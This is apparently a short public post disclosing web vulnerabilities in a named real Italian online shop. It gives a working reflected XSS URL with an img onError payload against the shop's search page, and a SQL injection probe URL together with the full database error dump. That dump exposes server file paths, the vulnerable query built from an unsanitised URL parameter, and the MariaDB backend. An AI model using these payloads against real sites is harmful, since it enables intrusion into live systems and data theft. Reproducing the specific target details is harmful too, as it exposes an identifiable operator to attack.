XSS
https://www.gmashop.it/Ricerca.cfm?testo="><img onError="alert(1)" src="a" /><"
archived: http://archive.is/P0OXI
SQL Injection
sample raising an error
https://www.gmashop.it/Inside.cfm?sezione=PRODOTTI&area=PRODOTTI&mod=elenco&apmenu=partner&codpar=2'00
archived: http://archive.is/ufpwM
Error Executing Database Query.
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''00 AND LINGUA = 'IT'' at line 3
The error occurred in /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1
Called from /var/www/html/gmashop/Inside.cfm: line 48
Called from /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1
Called from /var/www/html/gmashop/Inside.cfm: line 48
3 : WHERE
4 : cod= <cfif isdefined('URL.CODPAR') AND URL.CODPAR neq ''>#URL.CODPAR#<cfelseif isdefined('SelOggetti.COD_PARTNER')>#SelOggetti.COD_PARTNER#<cfelse>0</cfif>
5 : AND LINGUA = '#SESSION.lingua_sito#'
6 : </cfquery>
SQLSTATE 42000
DATASOURCE gmashop
VENDORERRORCODE 1064
SQL SELECT TITOLO,cod FROM partner WHERE cod= 2''00 AND LINGUA = 'IT'
Comments
Post a Comment